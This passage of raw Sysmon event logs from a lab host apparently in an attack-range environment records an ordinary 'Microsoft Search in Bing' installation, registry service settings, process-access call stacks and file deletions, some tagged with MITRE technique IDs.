Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+57f5f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+56e48|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000079694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:27.701{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MicrosoftSearchInBing\DescriptionA service to config default search engine to Bing 13241300x800000000000000079693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:27.701{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MicrosoftSearchInBing\ObjectNameLocalSystem 13241300x800000000000000079692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:27.701{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MicrosoftSearchInBing\DisplayNameMicrosoft Search in Bing 13241300x800000000000000079691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1031,T1050SetValue2021-04-20 14:58:27.701{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MicrosoftSearchInBing\ImagePath"C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe" 13241300x800000000000000079690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:27.701{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MicrosoftSearchInBing\ErrorControlDWORD (0x00000001) 13241300x800000000000000079689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1031,T1050SetValue2021-04-20 14:58:27.701{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MicrosoftSearchInBing\StartDWORD (0x00000002) 13241300x800000000000000079688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:27.701{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MicrosoftSearchInBing\TypeDWORD (0x00000010) 254200x800000000000000079687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10992021-04-20 14:58:27.701{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\UninstallService.exe2020-04-20 19:59:36.0002021-04-20 14:58:27.701 11241100x800000000000000079686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:58:27.701{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\UninstallService.exe2021-04-20 14:58:27.701 11241100x800000000000000079685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:27.685{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\System.Security.Cryptography.X509Certificates.dll2021-04-20 14:58:27.685 10341000x800000000000000079684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.685{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50925376C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe0x1438C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+73c87|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+7522e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+14519|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+1a430|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+84d6|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+638e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3b280|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3af5e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1015b|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1a277|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+2185f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+ae38|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+a8fb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+9264|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c 10341000x800000000000000079683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.685{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50925376C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+2d73e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+16070|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+15184|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+17233|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+1a40c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+84d6|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+638e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3b280|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3af5e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1015b|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1a277|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+2185f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+ae38|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+a8fb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+9264|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac 11241100x800000000000000079682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:27.685{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\System.Security.Cryptography.Primitives.dll2021-04-20 14:58:27.685 11241100x800000000000000079681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:27.685{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\System.Security.Cryptography.Encoding.dll2021-04-20 14:58:27.685 11241100x800000000000000079680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:27.685{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\System.Security.Cryptography.Algorithms.dll2021-04-20 14:58:27.685 11241100x800000000000000079679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:27.685{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\System.Net.Http.dll2021-04-20 14:58:27.685 11241100x800000000000000079678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:27.685{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\Services.dll2021-04-20 14:58:27.685 254200x800000000000000079677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10992021-04-20 14:58:27.685{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\RemoveMSBextension.exe2020-04-20 20:00:56.0002021-04-20 14:58:27.685 11241100x800000000000000079676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:58:27.685{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\RemoveMSBextension.exe2021-04-20 14:58:27.685 11241100x800000000000000079675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:27.669{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\NLog.dll2021-04-20 14:58:27.669 11241100x800000000000000079674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:27.669{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\Newtonsoft.Json.dll2021-04-20 14:58:27.669 11241100x800000000000000079673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:27.669{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\Models.dll2021-04-20 14:58:27.669 254200x800000000000000079672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10992021-04-20 14:58:27.654{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe2020-04-20 20:04:42.0002021-04-20 14:58:27.654 11241100x800000000000000079671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:58:27.654{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe2021-04-20 14:58:27.654 11241100x800000000000000079670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:27.654{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\Messaging.dll2021-04-20 14:58:27.654 11241100x800000000000000079669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:27.654{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\Managers.dll2021-04-20 14:58:27.654 254200x800000000000000079668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10992021-04-20 14:58:27.654{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MainExtBootStrap.exe2020-04-20 20:06:26.0002021-04-20 14:58:27.654 11241100x800000000000000079667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:58:27.654{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MainExtBootStrap.exe2021-04-20 14:58:27.654 254200x800000000000000079666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10992021-04-20 14:58:27.654{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\ExtensionNativeHost.exe2020-04-20 20:45:32.0002021-04-20 14:58:27.654 11241100x800000000000000079665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:58:27.654{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\ExtensionNativeHost.exe2021-04-20 14:58:27.654 10341000x800000000000000079664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.654{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC13-607E-440E-00000000BB01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000079663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:27.654{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft\Microsoft Search in Bing\DefaultPackOffer.dll2021-04-20 14:58:27.654 10341000x800000000000000079662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.638{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC13-607E-440E-00000000BB01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.638{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC13-607E-440E-00000000BB01}6544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.638{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d082a4.rbsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.623{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF3BBDDC40B843AEA1.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000079658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.623{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF8B8788BDF0C2C715.TMPMD5=C2AAC7162D475A174F61D81E7FF37AA8,SHA256=6C5C629A0F23239A5C73D80ADF4FFD2234E75F0C35547A09D7D407998DCAAB35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.607{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSIC6B7.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.591{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50925376C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+976c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+9264|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.560{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fc6e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.560{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3fbe5|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.560{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3f049|C:\Windows\System32\modernexecserver.dll+3fd2f|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.560{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f6a2|C:\Windows\System32\modernexecserver.dll+3fd1e|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.560{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fd0b|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.560{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3fdee|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 